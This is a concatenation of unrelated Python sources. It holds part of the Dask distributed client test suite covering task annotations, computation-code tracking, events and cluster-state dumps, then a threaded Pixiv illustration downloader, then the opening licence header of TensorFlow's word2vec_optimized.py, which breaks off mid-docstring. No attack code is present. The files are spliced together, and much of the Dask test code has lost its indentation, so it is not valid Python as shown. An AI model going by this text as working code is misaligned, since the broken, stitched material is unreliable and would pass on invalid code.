async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
@gen_cluster(client=True, nthreads=[("127.0.0.1", 0)])
async def test_get_client_functions_spawn_clusters(c, s, a):
# see gh4565
scheduler_addr = c.scheduler.address
def f(x):
with LocalCluster(
n_workers=1,
processes=False,
dashboard_address=":0",
worker_dashboard_address=":0",
) as cluster2:
with Client(cluster2) as c1:
c2 = get_client()
c1_scheduler = c1.scheduler.address
c2_scheduler = c2.scheduler.address
assert c1_scheduler != c2_scheduler
assert c2_scheduler == scheduler_addr
await c.gather(c.map(f, range(2)))
await a.close()
c_default = default_client()
assert c is c_default
def test_computation_code_walk_frames():
    """``Client._get_computation_code`` walks the call stack to find the
    user code that triggered a computation, honoring the
    ``computations.ignore-modules`` config."""
    test_function_code = inspect.getsource(test_computation_code_walk_frames)
    code = Client._get_computation_code()
    assert test_function_code == code
    def nested_call():
        return Client._get_computation_code()
    assert nested_call() == inspect.getsource(nested_call)
    # ignore-modules must be a list, not a bare string
    with pytest.raises(TypeError, match="Ignored modules must be a list"):
        with dask.config.set(
            {"distributed.diagnostics.computations.ignore-modules": "test_client"}
        ):
            code = Client._get_computation_code()
    with dask.config.set(
        {"distributed.diagnostics.computations.ignore-modules": ["test_client"]}
    ):
        import sys
        # with this test module ignored, the walk lands on our caller's frame
        upper_frame_code = inspect.getsource(sys._getframe(1))
        code = Client._get_computation_code()
        assert code == upper_frame_code
        assert nested_call() == upper_frame_code
def test_computation_object_code_dask_compute(client):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().compute()
y = future
test_function_code = inspect.getsource(test_computation_object_code_dask_compute)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == test_function_code
def test_computation_object_code_not_available(client):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
df = pd.DataFrame({"a": range(10)})
ddf = dd.from_pandas(df, npartitions=3)
result = np.where(ddf.a > 4)
def fetch_comp_code(dask_scheduler):
computations = list(dask_scheduler.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
return comp.code[0]
code = client.run_on_scheduler(fetch_comp_code)
assert code == "<Code not available>"
@gen_cluster(client=True)
async def test_computation_object_code_dask_persist(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = x.sum().persist()
await future
test_function_code = inspect.getsource(
test_computation_object_code_dask_persist.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_simple(c, s, a, b):
def func(x):
return x
fut = c.submit(func, 1)
await fut
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_simple.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_list_comp(c, s, a, b):
def func(x):
return x
futs = [c.submit(func, x) for x in range(10)]
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_list_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_dict_comp(c, s, a, b):
def func(x):
return x
futs = {x: c.submit(func, x) for x in range(10)}
await c.gather(futs)
test_function_code = inspect.getsource(
test_computation_object_code_client_submit_dict_comp.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
# Code is deduplicated
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_map(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_map.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True)
async def test_computation_object_code_client_compute(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
test_function_code = inspect.getsource(
test_computation_object_code_client_compute.__wrapped__
)
computations = list(s.computations)
assert len(computations) == 1
comp = computations[0]
assert len(comp.code) == 1
assert comp.code[0] == test_function_code
@gen_cluster(client=True, Worker=Nanny)
async def test_upload_directory(c, s, a, b, tmp_path):
from dask.distributed import UploadDirectory
# Be sure to exclude code coverage reports
files_start = {f for f in os.listdir() if not f.startswith(".coverage")}
with open(tmp_path / "foo.py", "w") as f:
f.write("x = 123")
with open(tmp_path / "bar.py", "w") as f:
f.write("from foo import x")
plugin = UploadDirectory(tmp_path, restart=True, update_path=True)
await c.register_worker_plugin(plugin)
[name] = a.plugins
assert os.path.split(tmp_path)[-1] in name
def f():
import bar
return bar.x
results = await c.run(f)
assert results[a.worker_address] == 123
assert results[b.worker_address] == 123
async with Nanny(s.address, local_directory=tmp_path / "foo", name="foo") as n:
results = await c.run(f)
assert results[n.worker_address] == 123
files_end = {f for f in os.listdir() if not f.startswith(".coverage")}
assert files_start == files_end # no change
@gen_cluster(client=True)
async def test_exception_text(c, s, a, b):
    """The scheduler's TaskState stores text renderings of a failed task's
    exception and traceback."""
    def bad(x):
        raise Exception(x)
    future = c.submit(bad, 123)
    await wait(future)
    ts = s.tasks[future.key]
    assert isinstance(ts.exception_text, str)
    assert "123" in ts.exception_text
    assert "Exception(x)" in ts.traceback_text
    assert "bad" in ts.traceback_text
@gen_cluster(client=True)
async def test_async_task(c, s, a, b):
    """Coroutine functions submitted as tasks are awaited on the worker."""
    async def f(x):
        return x + 1
    future = c.submit(f, 10)
    result = await future
    assert result == 11
@gen_cluster(client=True)
async def test_async_task_with_partial(c, s, a, b):
    """A ``functools.partial`` wrapping a coroutine function is still
    recognized and awaited on the worker."""
    async def f(x, y):
        return x + y + 1
    future = c.submit(functools.partial(f, 1), 10)
    result = await future
    assert result == 12
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic(c, s, a):
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"important": "event"})
while len(log) != 1:
await asyncio.sleep(0.01)
time_, msg = log[0]
assert isinstance(time_, float)
assert msg == {"important": "event"}
c.unsubscribe_topic("test-topic")
while s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"forget": "me"})
while len(s.events["test-topic"]) == 1:
await asyncio.sleep(0.01)
assert len(log) == 1
async def async_user_event_handler(event):
log.append(event)
await asyncio.sleep(0)
c.subscribe_topic("test-topic", async_user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
a.log_event("test-topic", {"async": "event"})
while len(log) == 1:
await asyncio.sleep(0.01)
assert len(log) == 2
time_, msg = log[1]
assert isinstance(time_, float)
assert msg == {"async": "event"}
# Even though the middle event was not subscribed to, the scheduler still
# knows about all and we can retrieve them
all_events = await c.get_events(topic="test-topic")
assert len(all_events) == 3
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_all_servers_use_same_channel(c, s, a):
"""Ensure that logs from all server types (scheduler, worker, nanny)
and the clients themselves arrive"""
log = []
def user_event_handler(event):
log.append(event)
c.subscribe_topic("test-topic", user_event_handler)
while not s.event_subscriber["test-topic"]:
await asyncio.sleep(0.01)
async with Nanny(s.address) as n:
a.log_event("test-topic", "worker")
n.log_event("test-topic", "nanny")
s.log_event("test-topic", "scheduler")
await c.log_event("test-topic", "client")
while not len(log) == 4 == len(set(log)):
await asyncio.sleep(0.1)
@gen_cluster(client=True, nthreads=[])
async def test_events_unsubscribe_raises_if_unknown(c, s):
with pytest.raises(ValueError, match="No event handler known for topic unknown"):
c.unsubscribe_topic("unknown")
@gen_cluster(client=True)
async def test_log_event_warn(c, s, a, b):
def foo():
get_worker().log_event(["foo", "warn"], "Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True)
async def test_log_event_warn_dask_warns(c, s, a, b):
from dask.distributed import warn
def foo():
warn("Hello!")
with pytest.warns(Warning, match="Hello!"):
await c.submit(foo)
@gen_cluster(client=True, Worker=Nanny)
async def test_print(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print("Hello!", 123, sep=":")
await c.submit(foo)
out, err = capsys.readouterr()
assert "Hello!:123" in out
@gen_cluster(client=True, Worker=Nanny)
async def test_print_non_msgpack_serializable(c, s, a, b, capsys):
from dask.distributed import print
def foo():
print(object())
await c.submit(foo)
out, err = capsys.readouterr()
assert "<object object at" in out
def test_print_simple(capsys):
    """``dask.distributed.print`` behaves like builtin print when called
    outside of any task (no worker to forward through)."""
    from dask.distributed import print
    print("Hello!", 123, sep=":")
    out, err = capsys.readouterr()
    assert "Hello!:123" in out
def _verify_cluster_dump(path, _format):
    """Load a cluster-state dump written by ``dump_cluster_state`` and
    check that it contains the expected top-level sections.

    ``_format`` selects the on-disk encoding: "msgpack" reads
    ``<path>.msgpack.gz``; anything else reads ``<path>.yaml``.
    """
    base = str(path)
    if _format == "msgpack":
        import gzip
        import msgpack
        with gzip.open(base + ".msgpack.gz") as fd:
            state = msgpack.unpack(fd)
    else:
        import yaml
        with open(base + ".yaml") as fd:
            state = yaml.load(fd, Loader=yaml.Loader)
    assert isinstance(state, dict)
    for section in ("scheduler", "workers", "versions"):
        assert section in state
@pytest.mark.parametrize("_format", ["msgpack", "json", "yaml"])
def test_dump_cluster_state(c, s, a, b, tmp_path, _format):
    """Sync ``Client.dump_cluster_state`` writes msgpack/yaml dumps and
    rejects unsupported formats with ValueError."""
    if _format == "json":
        ctx = pytest.raises(ValueError, match="Unsupported format")
    else:
        ctx = contextlib.nullcontext()
    filename = tmp_path / "foo"
    with ctx:
        c.dump_cluster_state(
            filename=filename,
            format=_format,
        )
        # Only reached when the dump call above did not raise
        _verify_cluster_dump(filename, _format)
@pytest.mark.parametrize("_format", ["msgpack", "json", "yaml"])
@gen_cluster(client=True)
async def test_dump_cluster_state_async(c, s, a, b, tmp_path, _format):
if _format == "json":
ctx = pytest.raises(ValueError, match="Unsupported format")
else:
ctx = contextlib.nullcontext()
filename = tmp_path / "foo"
with ctx:
await c.dump_cluster_state(
filename=filename,
format=_format,
)
_verify_cluster_dump(filename, _format)
@gen_cluster(client=True)
async def test_dump_cluster_state_exclude(c, s, a, b, tmp_path):
futs = c.map(inc, range(10))
while len(s.tasks) != len(futs):
await asyncio.sleep(0.01)
exclude = [
# these are TaskState attributes
"_runspec",
"runspec",
]
filename = tmp_path / "foo"
await c.dump_cluster_state(
filename=filename,
format="yaml",
)
with open(str(filename) + ".yaml") as fd:
import yaml
state = yaml.load(fd, Loader=yaml.Loader)
assert "workers" in state
assert len(state["workers"]) == len(s.workers)
assert "scheduler" in state
assert "tasks" in state["scheduler"]
tasks = state["scheduler"]["tasks"]
assert len(tasks) == len(futs)
for k, task_dump in tasks.items():
assert not any(blocked in task_dump for blocked in exclude)
assert k in s.tasks
|
pixiv.py | #!/usr/bin/env python3
"""
pixiv
Usage:
pixiv.py
pixiv.py <id>...
pixiv.py -r [-d | --date=<date>]
pixiv.py -u
Arguments:
<id> user_ids
Options:
-r Download by ranking
-d <date> --date <date> Target date
-u Update exist folder
-h --help Show this screen
-v --version Show version
Examples:
pixiv.py 7210261 1980643
pixiv.py -r -d 2016-09-24
"""
import datetime
import math
import os
import queue
import re
import sys
import threading
import time
import traceback
import requests
from docopt import docopt
from tqdm import tqdm
from api import PixivApi
from i18n import i18n as _
from model import PixivIllustModel
_THREADING_NUMBER = 10
_finished_download = 0
_CREATE_FOLDER_LOCK = threading.Lock()
_PROGRESS_LOCK = threading.Lock()
_SPEED_LOCK = threading.Lock()
_Global_Download = 0
_error_count = {}
_ILLUST_PER_PAGE = 30
_MAX_ERROR_COUNT = 5
def get_default_save_path():
    """Return (creating it if needed) the default ``illustrations`` folder
    located next to the running script.

    Creation is guarded by ``_CREATE_FOLDER_LOCK`` because download worker
    threads may race to create folders.
    """
    current_path = os.path.dirname(os.path.abspath(sys.argv[0]))
    filepath = os.path.join(current_path, 'illustrations')
    if not os.path.exists(filepath):
        with _CREATE_FOLDER_LOCK:
            # exist_ok avoids the check-then-create race the original had,
            # and os.makedirs already creates missing parents, so the old
            # two-step makedirs(dirname) + makedirs(filepath) is unnecessary.
            os.makedirs(filepath, exist_ok=True)
    return filepath
def get_speed(elapsed):
    """Return the download speed over ``elapsed`` seconds, e.g. `` 1.23 MB/s``.

    Reads and resets the shared byte counter, so each call reports the
    traffic of the interval since the previous call.

    Args:
        elapsed: seconds since the counter was last reset.
    """
    with _SPEED_LOCK:
        global _Global_Download
        downloaded = _Global_Download
        _Global_Download = 0
    # Guard elapsed <= 0: the old code raised ZeroDivisionError there.
    if elapsed <= 0 or downloaded == 0:
        return '%8.2f /s' % 0
    speed = downloaded / elapsed
    units = [' B', 'KB', 'MB', 'GB', 'TB', 'PB']
    # Clamp: for sub-1 B/s speeds log() is negative and the old code
    # indexed units[-1] ('PB'); absurdly high speeds would overflow the list.
    unit = min(max(math.floor(math.log(speed, 1024.0)), 0), len(units) - 1)
    speed /= math.pow(1024.0, unit)
    return '%6.2f %s/s' % (speed, units[unit])
def print_progress(max_size):
    """Render a tqdm progress bar until ``max_size`` downloads have completed."""
    global _finished_download
    progress_bar = tqdm(total=max_size)
    reported = 0
    while _finished_download != max_size:
        progress_bar.update(_finished_download - reported)
        reported = _finished_download
        time.sleep(0.5)
    # Flush whatever finished between the last poll and loop exit.
    progress_bar.update(_finished_download - reported)
    progress_bar.close()
def download_file(url, filepath):
    """Download ``url`` to ``filepath``, streaming chunks straight to disk.

    Args:
        url: remote image URL.
        filepath: local destination path (parent dir must already exist).

    Raises:
        ConnectionError: if the server responds with a non-OK status.
    """
    headers = {'Referer': 'http://www.pixiv.net/'}
    r = requests.get(url, headers=headers, stream=True, timeout=PixivApi.timeout)
    if r.status_code != requests.codes.ok:
        raise ConnectionError('\r', _('Connection error: %s') % r.status_code)
    global _Global_Download
    # Stream to disk instead of buffering the whole image in memory.
    # NOTE: the old code silently wrote nothing when the Content-Length
    # header was missing; we now download the body regardless.
    with open(filepath, 'wb') as f:
        for chunk in r.iter_content(1024 * 16):
            f.write(chunk)
            with _SPEED_LOCK:
                _Global_Download += len(chunk)
def download_threading(download_queue):
    """Worker loop: pop queued images and download them, retrying on error.

    Each queue item is a dict with 'url', 'file' (name) and 'path' keys.
    Failures are re-queued until the URL has failed _MAX_ERROR_COUNT times.
    """
    global _finished_download
    while not download_queue.empty():
        illustration = download_queue.get()
        filepath = illustration['path']
        filename = illustration['file']
        url = illustration['url']
        # How many times this URL has already failed.
        count = _error_count.get(url, 0)
        if count < _MAX_ERROR_COUNT:
            if not os.path.exists(filepath):
                # Double-checked under the lock so only one thread creates
                # the target directory.
                with _CREATE_FOLDER_LOCK:
                    if not os.path.exists(os.path.dirname(filepath)):
                        os.makedirs(os.path.dirname(filepath))
            try:
                download_file(url, filepath)
                with _PROGRESS_LOCK:
                    _finished_download += 1
            except Exception as e:
                # Re-queue for another attempt and bump the failure counter.
                if count < _MAX_ERROR_COUNT:
                    print(_('%s => %s download error, retry') % (e, filename))
                    download_queue.put(illustration)
                    _error_count[url] = count + 1
        else:
            # Retries exhausted: count it as done so the progress bar can finish.
            print(url, 'reach max retries, canceled')
            with _PROGRESS_LOCK:
                _finished_download += 1
        download_queue.task_done()
def start_and_wait_download_threading(download_queue, count):
    """Spawn the progress reporter plus download workers; block until done."""
    reporter = threading.Thread(target=print_progress, args=(count,))
    reporter.daemon = True
    reporter.start()
    for _worker_idx in range(_THREADING_NUMBER):
        worker = threading.Thread(target=download_threading, args=(download_queue,))
        worker.daemon = True
        worker.start()
    # The reporter exits once `count` downloads are accounted for.
    reporter.join()
    download_queue.join()
def get_filepath(url, illustration, save_path='.', add_user_folder=False, add_rank=False):
    """Resolve the local (filename, filepath) for one image URL.

    Args:
        url: remote image URL; its basename becomes the local filename.
        illustration: model exposing user_id / user_name / rank attributes.
        save_path: base download directory.
        add_user_folder: place the file inside a per-artist "<id> <name>"
            folder, reusing an existing folder for that artist id if present.
        add_rank: prefix the filename with the illustration's ranking position.

    Returns:
        (filename, filepath) tuple.
    """
    if add_user_folder:
        user_id = illustration.user_id
        user_name = illustration.user_name
        current_path = get_default_save_path()
        cur_dirs = list(filter(os.path.isdir, [os.path.join(current_path, i) for i in os.listdir(current_path)]))
        cur_user_ids = [os.path.basename(cur_dir).split()[0] for cur_dir in cur_dirs]
        if user_id not in cur_user_ids:
            # Strip characters Windows forbids in directory names.
            dir_name = re.sub(r'[<>:"/\\|\?\*]', ' ', user_id + ' ' + user_name)
        else:
            dir_name = list(i for i in cur_dirs if os.path.basename(i).split()[0] == user_id)[0]
        save_path = os.path.join(save_path, dir_name)
    filename = url.split('/')[-1]
    if add_rank:
        # Bug fix: the rank prefix must keep the real filename instead of
        # replacing it with a placeholder.
        filename = f'{illustration.rank} - {filename}'
    filepath = os.path.join(save_path, filename)
    return filename, filepath
def check_files(illustrations, save_path='.', add_user_folder=False, add_rank=False):
    """Queue every image that is not on disk yet.

    Returns:
        (download_queue, count, index_list): the work queue, the number of
        files queued, and the indices of illustrations with at least one
        missing image.
    """
    download_queue = queue.Queue()
    index_list = []
    count = 0
    if illustrations:
        previous_index = -1
        for index, illustration in enumerate(illustrations):
            for url in illustration.image_urls or ():
                filename, filepath = get_filepath(url, illustration, save_path, add_user_folder, add_rank)
                if not os.path.exists(filepath):
                    # Record each illustration index at most once.
                    if previous_index != index:
                        previous_index = index
                        index_list.append(index)
                    download_queue.put({'url': url, 'file': filename, 'path': filepath})
                    count += 1
    return download_queue, count, index_list
def count_illustrations(illustrations):
    """Total number of image URLs across all illustrations."""
    total = 0
    for illustration in illustrations:
        total += len(illustration.image_urls)
    return total
def is_manga(illustrate):
    """Return True when the work is flagged as manga or typed 'manga'.

    Idiom fix: ``True if x else False`` replaced with ``bool(x)``.
    """
    return bool(illustrate.is_manga or illustrate.type == 'manga')
def download_illustrations(user, data_list, save_path='.', add_user_folder=False, add_rank=False, skip_manga=False):
    """Download every not-yet-present illustration described by ``data_list``.

    Args:
        user: PixivApi()
        data_list: json
        save_path: str, download path of the illustrations
        add_user_folder: bool, whether put the illustration into user folder
        add_rank: bool, add illustration rank at the beginning of filename
        skip_manga: bool, drop manga works before downloading
    """
    illustrations = PixivIllustModel.from_data(data_list)
    if skip_manga:
        manga_number = sum(is_manga(i) for i in illustrations)
        if manga_number:
            print('skip', manga_number, 'manga')
        illustrations = [i for i in illustrations if not is_manga(i)]
    download_queue, count, _indices = check_files(illustrations, save_path, add_user_folder, add_rank)
    if count > 0:
        print(_('Start download, total illustrations '), count)
        # Reset the shared progress/speed counters for this batch.
        global _finished_download, _Global_Download
        _finished_download = 0
        _Global_Download = 0
        start_and_wait_download_threading(download_queue, count)
        print()
    else:
        print(_('There is no new illustration need to download'))
def download_by_user_id(user, user_ids=None):
    """Download the complete works of each given artist id (prompting if none)."""
    save_path = get_default_save_path()
    if not user_ids:
        user_ids = input(_('Input the artist\'s id:(separate with space)')).strip().split(' ')
    for user_id in user_ids:
        print(_('Artists %s') % user_id)
        works = user.get_all_user_illustrations(user_id)
        download_illustrations(user, works, save_path, add_user_folder=True)
def download_by_ranking(user):
    """Download today's ranking into a dated ``<date> ranking`` folder."""
    today = str(datetime.date.today())
    target_dir = os.path.join(get_default_save_path(), today + ' ranking')
    ranking = user.get_ranking_illustrations()
    download_illustrations(user, ranking, target_dir, add_rank=True)
def download_by_history_ranking(user, date=''):
    """Download the ranking of a past date (prompting if not supplied).

    Falls back to yesterday's date when the input is not YYYY-MM-DD.
    """
    if not date:
        date = input(_('Input the date:(eg:2015-07-10)'))
    # Raw string: "\d" in a plain literal is an invalid escape sequence
    # (DeprecationWarning, SyntaxError in future Pythons).
    if not re.search(r"^\d{4}-\d{2}-\d{2}", date):
        print(_('[invalid date format]'))
        date = str(datetime.date.today() - datetime.timedelta(days=1))
    save_path = os.path.join(get_default_save_path(), date + ' ranking')
    data_list = user.get_ranking_illustrations(date=date)
    download_illustrations(user, data_list, save_path, add_rank=True)
def artist_folder_scanner(user, user_id_list, save_path, final_list, fast):
    """Worker: pop artist folders off ``user_id_list`` and collect new works.

    Args:
        user: PixivApi-like client with get_all_user_illustrations().
        user_id_list: queue.Queue of {'id', 'folder'} dicts.
        save_path: root folder containing the per-artist directories.
        final_list: shared output list of raw work dicts to download.
        fast: stop paging as soon as an already-downloaded file is seen.
    """
    while not user_id_list.empty():
        user_info = user_id_list.get()
        user_id = user_info['id']
        folder = user_info['folder']
        try:
            if fast:
                # Page through the artist's works newest-first, stopping once
                # the newest work of a page already exists on disk.
                data_list = []
                offset = 0
                page_result = user.get_all_user_illustrations(user_id, offset, _ILLUST_PER_PAGE)
                if len(page_result) > 0:
                    data_list.extend(page_result)
                    file_path = os.path.join(save_path, folder, data_list[-1]['image_urls']['large'].split('/')[-1])
                    while not os.path.exists(file_path) and len(page_result) == _ILLUST_PER_PAGE:
                        offset += _ILLUST_PER_PAGE
                        page_result = user.get_all_user_illustrations(user_id, offset, _ILLUST_PER_PAGE)
                        data_list.extend(page_result)
                        file_path = os.path.join(save_path, folder, data_list[-1]['image_urls']['large'].split('/')[-1])
                        # prevent rate limit
                        time.sleep(1)
            else:
                # Full scan: fetch the artist's entire catalogue.
                data_list = user.get_all_user_illustrations(user_id)
            illustrations = PixivIllustModel.from_data(data_list)
            count, checked_list = check_files(illustrations, save_path, add_user_folder=True, add_rank=False)[1:3]
            # In interactive mode (no CLI args) always report; otherwise only
            # report artists that actually have something new.
            if len(sys.argv) < 2 or count:
                try:
                    print(_('Artists %s [%s]') % (folder, count))
                except UnicodeError:
                    # Fall back to the numeric id if the folder name cannot be
                    # printed on this console encoding.
                    print(_('Artists %s ?? [%s]') % (user_id, count))
            with _PROGRESS_LOCK:
                for index in checked_list:
                    final_list.append(data_list[index])
        except Exception:
            # Best-effort per artist: log and keep scanning the rest.
            traceback.print_exc()
        user_id_list.task_done()
def update_exist(user, fast=True):
    """Re-scan every existing per-artist folder and download new works.

    Args:
        user: PixivApi()
        fast: stop paging an artist once an already-downloaded file is seen.
    """
    current_path = get_default_save_path()
    final_list = []
    user_id_list = queue.Queue()
    for folder in os.listdir(current_path):
        if os.path.isdir(os.path.join(current_path, folder)):
            # Folders are named "<numeric id> <artist name>".
            # Raw string fixes the invalid "\d" escape of the old code.
            match = re.search(r'^(\d+) ', folder)
            if match:
                user_id_list.put({'id': match.group(1), 'folder': folder})
    # use one thread to prevent Rate Limit in new App API
    for _thread_idx in range(1):
        scan_t = threading.Thread(target=artist_folder_scanner,
                                  args=(user, user_id_list, current_path, final_list, fast,))
        scan_t.daemon = True
        scan_t.start()
    user_id_list.join()
    download_illustrations(user, final_list, current_path, add_user_folder=True)
def remove_repeat(user):
    """Delete xxxxx.img if xxxxx_p0.img exist

    Bug fixes: the parameter was named ``_``, shadowing the i18n translate
    function so ``_('...')`` actually called the PixivApi object passed in
    by main(); and ``match.string.replace('.', ...)`` replaced *every* dot
    in the filename instead of only the id/extension separator.
    """
    choice = input(_('Dangerous Action: continue?(y/n)'))
    if choice == 'y':
        illust_path = get_default_save_path()
        for folder in os.listdir(illust_path):
            if os.path.isdir(os.path.join(illust_path, folder)):
                if re.search(r'^(\d+) ', folder):
                    path = os.path.join(illust_path, folder)
                    for file_name in os.listdir(path):
                        if re.search(r'^\d+\.', file_name):
                            # Only the first dot separates the id from the
                            # extension: "123.jpg" -> "123_p0.jpg".
                            paged_name = file_name.replace('.', '_p0.', 1)
                            if os.path.isfile(os.path.join(path, paged_name)):
                                os.remove(os.path.join(path, file_name))
                                print('Delete', os.path.join(path, file_name))
def main():
    """Entry point: dispatch on CLI arguments, or run the interactive menu."""
    user = PixivApi()
    if len(sys.argv) > 1:
        print(datetime.datetime.now().strftime('%X %x'))
        ids = arguments['<id>']
        is_rank = arguments['-r']
        date = arguments['--date']
        is_update = arguments['-u']
        if ids:
            download_by_user_id(user, ids)
        elif is_rank:
            if date:
                date = date[0]
                download_by_history_ranking(user, date)
            else:
                download_by_ranking(user)
        elif is_update:
            update_exist(user)
        print(datetime.datetime.now().strftime('%X %x'))
    else:
        print(_(' Pixiv Downloader 2.4 ').center(77, '#'))
        options = {
            '1': download_by_user_id,
            '2': download_by_ranking,
            '3': download_by_history_ranking,
            '4': update_exist,
            '5': remove_repeat
        }
        while True:
            print(_('Which do you want to:'))
            for i in sorted(options.keys()):
                print('\t %s %s' % (i, _(options[i].__name__).replace('_', ' ')))
            choose = input('\t e %s \n:' % _('exit'))
            if choose in [str(i) for i in range(1, len(options) + 1)]:
                print((' ' + _(options[choose].__name__).replace('_', ' ') + ' ').center(60, '#') + '\n')
                # Bug fix: ``choose`` is a string, so the old ``choose == 4``
                # was always False and update_exist never received fast=False.
                if choose == '4':
                    options[choose](user, False)
                else:
                    options[choose](user)
                print('\n' + (' ' + _(options[choose].__name__).replace('_', ' ') + _(' finished ')).center(60,
                                                                                                           '#') + '\n')
            elif choose == 'e':
                break
            else:
                print(_('Wrong input!'))
if __name__ == '__main__':
    # Parse CLI options once at module scope; main() reads this global.
    arguments = docopt(__doc__, version='pixiv 3')
    sys.exit(main())
|
word2vec_optimized.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
